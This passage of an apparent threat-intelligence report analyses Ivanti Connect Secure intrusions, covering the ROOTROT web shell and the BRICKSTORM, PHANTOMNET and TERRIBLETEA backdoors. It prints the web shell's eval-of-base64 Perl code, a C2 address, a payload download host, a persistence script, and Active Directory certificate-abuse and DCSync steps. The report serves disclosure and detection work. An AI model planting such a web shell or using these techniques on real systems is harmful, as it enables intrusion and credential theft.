$output .= \"<!--\\n\";\n \ my $key = CGI::param('[REDACTED]');\n use MIME::Base64;\n if(defined($key)){\n \ my $arg=decode_base64(\"$key\");\n eval($arg);\n \ }\n $output .= \"-->\\n\";\n } };\n if ($@) {\n \ $error = $context->catch($@, \\$output);\n die $error unless $error->type eq 'return';\n }\n \n return $output;\n \ },</code></pre>\n<p style=\"text-align: center;\"><span style=\"color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\">Figure 2: Code block inserted into the <code>setcookie.thtml.ttc</code> file</span></p></div>\n<div class=\"block-paragraph_advanced\"><p><span style=\"vertical-align: baseline;\">During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of </span><code style=\"vertical-align: baseline;\"><!--\\n and -->\\n</code><span style=\"vertical-align: baseline;\"> at the end of the response from /</span><code style=\"vertical-align: baseline;\">dana-na/auth/setcookie.cgi</code><span style=\"vertical-align: baseline;\">. </span></p>\n<p><span style=\"vertical-align: baseline;\"><span style=\"vertical-align: baseline;\">As of April 3, 2024, <span style=\"vertical-align: baseline;\">the latest external ICT will detect modifications to </span><code style=\"vertical-align: baseline;\">setcookie.thtml.ttc</code></span>.</span></p>\n<h3><span style=\"vertical-align: baseline;\">Lateral Movement Leading to vCenter Compromise</span></h3>\n<p><span style=\"vertical-align: baseline;\">Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. </span></p>\n<p><span style=\"vertical-align: baseline;\">After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine.</span></p>\n<p><span style=\"vertical-align: baseline;\">Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (</span><code style=\"vertical-align: baseline;\">/home/vsphere-ui/vcli</code><code style=\"vertical-align: baseline;\">)</code><span style=\"vertical-align: baseline;\">. Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, </span><code style=\"vertical-align: baseline;\">vami-http</code><span style=\"vertical-align: baseline;\">. </span></p>\n<h4><span style=\"vertical-align: baseline;\">BRICKSTORM</span></h4>\n<p><span style=\"vertical-align: baseline;\">BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2.</span></p>\n<p><span style=\"vertical-align: baseline;\">Upon execution, BRICKSTORM checks for an environment variable, </span><code style=\"vertical-align: baseline;\">WRITE_LOG</code><span style=\"vertical-align: baseline;\">, to determine if the file needs to be executed as a child proce</span><span style=\"vertical-align: baseline;\">ss.</span><span style=\"vertical-align: baseline;\"> </span><span style=\"vertical-align: baseline;\">If th</span><span style=\"vertical-align: baseline;\">e variable returns false or is unset, it will copy the BRICKSTORM sample from </span><code style=\"vertical-align: baseline;\">/home/vsphere-ui/vcli </code><span style=\"vertical-align: baseline;\">to</span><code style=\"vertical-align: baseline;\"> /opt/vmware/sbin </code><span style=\"vertical-align: baseline;\">as </span><code style=\"vertical-align: baseline;\">vami-httpd</code><span style=\"vertical-align: baseline;\">. It will then execute the copied BRICKSTORM sample and terminate execution.</span></p>\n<p><span style=\"vertical-align: baseline;\"> If </span><code style=\"vertical-align: baseline;\">WRITE_LOG</code><span style=\"vertical-align: baseline;\"> is set to tru</span><span style=\"vertical-align: baseline;\">e,</span><span style=\"vertical-align: baseline;\"> </span><span style=\"vertical-align: baseline;\">it assumes </span><span style=\"vertical-align: baseline;\">it is running as the correct process, deletes </span><code style=\"vertical-align: baseline;\">/opt/vmware/sbin/vami-httpd</code><span style=\"vertical-align: baseline;\">, and continues execution.</span></p>\n<p><span style=\"vertical-align: baseline;\">BRICKSTORM contains a separate function called </span><code style=\"vertical-align: baseline;\">Watcher,</code><span style=\"vertical-align: baseline;\"> which contains self-monitoring functionality. If the environment variable </span><code style=\"vertical-align: baseline;\">WORKER</code><span style=\"vertical-align: baseline;\"> </span><span style=\"vertical-align: baseline;\">returns false or is unset, it will continue the monitoring, checking for the file </span><code style=\"vertical-align: baseline;\">/home/vsphere-ui/vcli</code><span style=\"vertical-align: baseline;\"> and copying the contents over to </span><code style=\"vertical-align: baseline;\">/opt/vmware/sbin/vami-httpd</code><span style=\"vertical-align: baseline;\">. Then, it sets the appropriate environment variables and spawns the proc</span><span style=\"vertical-align: baseline;\">es</span><span style=\"vertical-align: baseline;\">s. The watcher process then begins monitoring the exit status of the child process.</span></p>\n<p><span style=\"vertical-align: baseline;\">If it finds the environment variable </span><code style=\"vertical-align: baseline;\">WORKER</code><span style=\"vertical-align: baseline;\"> is set to </span><code style=\"vertical-align: baseline;\">true</code><span style=\"vertical-align: baseline;\">, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the </span><code style=\"vertical-align: baseline;\">Watcher</code><span style=\"vertical-align: baseline;\"> function.</span></p>\n<p><span style=\"vertical-align: baseline;\">BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of </span><code style=\"vertical-align: baseline;\">wss://opra1.oprawh.workers[.]dev</code><span style=\"vertical-align: baseline;\">. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses.</span></p></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>https://9.9.9.9/dns-query\nhttps://45.90.28.160/dns-query\nhttps://45.90.30.160/dns-query\nhttps://149.112.112.112/dns-query\nhttps://9.9.9.11/dns-query\nhttps://1.1.1.1/dns-query\nhttps://1.0.0.1/dns-query\nhttps://8.8.8.8/dns-query\nhttps://8.8.4.4/dns-query</code></pre>\n<p style=\"text-align: center;\"><span style=\"vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\">Figure 3: DNS over HTTPS addresses</span></p></div>\n<div class=\"block-paragraph_advanced\"><p><span style=\"vertical-align: baseline;\">BRICKSTORM appears to leverage a custom Go package called </span><code style=\"vertical-align: baseline;\">wssoft</code><span style=\"vertical-align: baseline;\">. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware.</span></p>\n<p><span style=\"vertical-align: baseline;\">Table 1 provides the four core functions provided by </span><code style=\"vertical-align: baseline;\">wssoft</code><span style=\"vertical-align: baseline;\">.<br/><br/></span></p>\n<div align=\"left\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\"><table border=\"1px\" cellpadding=\"16px\" style=\"border-collapse: collapse; margin-left: auto; margin-right: auto;\"><colgroup><col/><col/></colgroup>\n<tbody>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Function</strong></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Comments</strong></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Spawning a web server</span></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">See below for accepted routes/endpoints</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Command execution</span></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Executes shell commands using </span><code style=\"vertical-align: baseline;\">/bin/sh</code></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Command execution (“NoContext”)</span></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Executes shell commands using calls to os. </span><code style=\"vertical-align: baseline;\">Exec</code></p>\n<p><span style=\"vertical-align: baseline;\">likely accepts commands </span><code style=\"vertical-align: baseline;\">run_shell</code><span style=\"vertical-align: baseline;\"> and </span><code style=\"vertical-align: baseline;\">exit</code></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SOCKS relaying</span></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Connection proxying</span></p>\n</td>\n</tr>\n</tbody>\n</table></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<p style=\"text-align: center;\"><span style=\"color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\"><span style=\"vertical-align: baseline;\">Table 1: </span><code style=\"vertical-align: baseline;\">wssoft</code><span style=\"vertical-align: baseline;\"> capabilities</span></span></p>\n<p><span style=\"vertical-align: baseline;\">When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses </span><a href=\"https://github.com/gorilla/mux\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">Gorilla/mux</span></a><span style=\"vertical-align: baseline;\"> to handle the endpoint routing and </span><a href=\"https://github.com/lonng/nex\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">lonnng/nex</span></a><span style=\"vertical-align: baseline;\"> to marshal the data into JSON.</span></p>\n<p><span style=\"vertical-align: baseline;\">Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.<br/><br/></span></p>\n<div align=\"left\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\"><table border=\"1px\" cellpadding=\"16px\" style=\"border-collapse: collapse; margin-left: auto; margin-right: auto;\"><colgroup><col/><col/></colgroup>\n<tbody>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Endpoint</strong></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Function</strong></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/change-dir</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Change directory</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/delete-dir</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Deletes a directory</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/delete-file</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Deletes a file</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/mkdir</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Makes a directory (create subdirectories as necessary)</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/list-dir</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Lists directory contents</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/rename</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Renames a file</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/put-file</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">File upload given a destination path, can optionally append to file</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/get-file</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">File download</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/slice-up</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">May upload large files in separate chunks</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/file-md5</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Calculates file MD5</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/up</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Uploads a file using a web form (includes SHA256 hashing)</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/api/file/stat</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Gets file information</span></p>\n</td>\n</tr>\n</tbody>\n</table></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<p style=\"text-align: center;\"><span style=\"vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\">Table 2: BRICKSTORM endpoints</span></p></div>\n<div class=\"block-paragraph_advanced\"><h3><span style=\"vertical-align: baseline;\">Lateral Movement Leading to Active Directory Compromise</span></h3>\n<p><span style=\"vertical-align: baseline;\">UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in </span><a href=\"https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence\"><span style=\"text-decoration: underline; vertical-align: baseline;\">Cutting Edge Part 3</span></a><span style=\"vertical-align: baseline;\">. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally.</span></p>\n<h4><span style=\"vertical-align: baseline;\">Attack Path Diagram</span></h4></div>\n<div class=\"block-image_full_width\">\n\n\n\n\n\n\n \ \n <div class=\"article-module h-c-page\">\n <div class=\"h-c-grid\">\n \ \n\n <figure class=\"article-image--large\n \n \n h-c-grid__col\n \ h-c-grid__col--6 h-c-grid__col--offset-3\n \n \n \"\n \ >\n\n \n \n \n <img\n src=\"https://storage.googleapis.com/gweb-cloudblog-publish/images/cutting-edge4-fig4.max-1000x1000.png\"\n \ \n alt=\"UNC5330 attack path diagram\">\n \n </a>\n \ \n <figcaption class=\"article-image__caption \"><p data-block-key=\"mx14r\">Figure 4: UNC5330 attack path diagram</p></figcaption>\n \n </figure>\n\n \n </div>\n \ </div>\n \n\n\n\n\n</div>\n<div class=\"block-paragraph_advanced\"><h4><span style=\"vertical-align: baseline;\">Windows Certificate Template Abuse </span></h4>\n<p><span style=\"vertical-align: baseline;\">UNC5330 used the </span><code style=\"vertical-align: baseline;\">ldap-ivanti</code><span style=\"vertical-align: baseline;\"> account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, </span><code style=\"vertical-align: baseline;\">testComputer$</code><span style=\"vertical-align: baseline;\">. UNC5330 used the newly created </span><code style=\"vertical-align: baseline;\">testComputer$</code><span style=\"vertical-align: baseline;\"> computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to </span><code style=\"vertical-align: baseline;\">Domain Computers</code><span style=\"vertical-align: baseline;\">. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement.</span></p>\n<p><span style=\"vertical-align: baseline;\">Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor.</span></p>\n<h4><span style=\"vertical-align: baseline;\">WMI Event Consumers</span></h4>\n<p><span style=\"vertical-align: baseline;\">WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following:</span></p>\n<ol>\n<li aria-level=\"1\" style=\"list-style-type: decimal; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with </span><code style=\"vertical-align: baseline;\">cmd.exe</code><span style=\"vertical-align: baseline;\">.</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: decimal; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Wrote command output to a </span><code style=\"vertical-align: baseline;\">.log</code><span style=\"vertical-align: baseline;\"> file in </span><code style=\"vertical-align: baseline;\">C:\\Windows\\Temp</code><span style=\"vertical-align: baseline;\">.</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: decimal; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Deleted the scheduled task.</span></p>\n</li>\n</ol>\n<p><span style=\"vertical-align: baseline;\">The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.</span></p>\n<h4><span style=\"vertical-align: baseline;\">TONERJAM</span></h4>\n<p><span style=\"vertical-align: baseline;\">TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution.</span></p>\n<h4><span style=\"vertical-align: baseline;\">PHANTOMNET</span></h4>\n<p><span style=\"vertical-align: baseline;\">PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET's core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed.</span></p>\n<h3><span style=\"vertical-align: baseline;\">SLIVER C2</span></h3>\n<p><span style=\"vertical-align: baseline;\">During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a </span><code style=\"vertical-align: baseline;\">systemd</code><span style=\"vertical-align: baseline;\"> service file to register one of the copies of SLIVER as a persistent daemon.<br/><br/></span></p>\n<div align=\"left\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\"><table border=\"1px\" cellpadding=\"16px\" style=\"border-collapse: collapse; margin-left: auto; margin-right: auto;\"><colgroup><col/><col/></colgroup>\n<tbody>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Path</strong></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Description</strong></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/home/bin/netmon</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/home/bin/logd</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/home/runtime/logd</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">/home/config/logd.spec.cfg</code></p>\n</td>\n<td style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">systemd</code><span style=\"vertical-align: baseline;\"> service unit configuration file</span></p>\n</td>\n</tr>\n</tbody>\n</table></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<p style=\"text-align: center;\"><span style=\"vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\">Table 3: SLIVER components</span></p>\n<p><span style=\"vertical-align: baseline;\">Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in </span><a href=\"https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">Cutting Edge, Part 2</span></a><span style=\"vertical-align: baseline;\">. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.</span></p>\n<h3><span style=\"vertical-align: baseline;\">TERRIBLETEA</span></h3>\n<p><span style=\"vertical-align: baseline;\">At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use </span><code style=\"vertical-align: baseline;\">curl</code><span style=\"vertical-align: baseline;\"> to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed </span><code style=\"vertical-align: baseline;\">curl</code><span style=\"vertical-align: baseline;\"> attempt, UNC5266 ran a </span><code style=\"vertical-align: baseline;\">wget</code><span style=\"vertical-align: baseline;\"> request to an anonymous file sharing site:</span><code style=\"vertical-align: baseline;\"> pan.xj.hk</code><span style=\"vertical-align: baseline;\">. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes.</span></p>\n<p><span style=\"vertical-align: baseline;\">TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including:</span></p>\n<ul>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Command execution</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Keystroke logging</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">SOCKS5 proxy</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Port scanning</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">File system interaction</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">SQL query execution</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Screen captures</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed:</span></p>\n</li>\n<ul>\n<li aria-level=\"2\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><code style=\"vertical-align: baseline;\">chmod +x /tmp/.udevd</code></p>\n</li>\n<li aria-level=\"2\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><code style=\"vertical-align: baseline;\">/tmp/.udevd <args></code></p>\n</li>\n<li aria-level=\"2\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><code style=\"vertical-align: baseline;\">ls -lahrt /home/</code></p>\n</li>\n</ul>\n</ul>\n<p><span style=\"vertical-align: baseline;\"><span style=\"vertical-align: baseline;\">TERRIBLETEA can take different execution paths depending on what environment it is configured for, either </span><code style=\"vertical-align: baseline;\">linux_amd64</code><span style=\"vertical-align: baseline;\"> or </span><code style=\"vertical-align: baseline;\">darwin_amd64</code><span style=\"vertical-align: baseline;\">. In this instance, TERRIBLETEA is configured for the </span><code style=\"vertical-align: baseline;\">linux_amd64</code><span style=\"vertical-align: baseline;\"> environment. The sample persists with a Bash profile script located at </span><code style=\"vertical-align: baseline;\">/etc/profile.d/cron.sh</code><span style=\"vertical-align: baseline;\"> for persistence.</span></span></p></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code># Initialization script for bash and sh\n# export AFS if you are in AFS environment\na=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'`\nif [ \"$a\" -eq 0 ] \nthen\n/bin/cron\nfi</code></pre>\n<p style=\"text-align: center;\"><span style=\"color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\"><span style=\"vertical-align: baseline;\">Figure 5: TERRIBLETEA Bash profile script</span></span></p></div>\n<div class=\"block-paragraph_advanced\"><h2><span style=\"vertical-align: baseline;\">Outlook and Implications</span></h2>\n<p><span style=\"vertical-align: baseline;\">The activity detailed in this blog, as well as the recently published </span><a href=\"https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence\"><span style=\"text-decoration: underline; vertical-align: baseline;\">Cutting Edge, Part 3</span></a><span style=\"vertical-align: baseline;\"> highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing 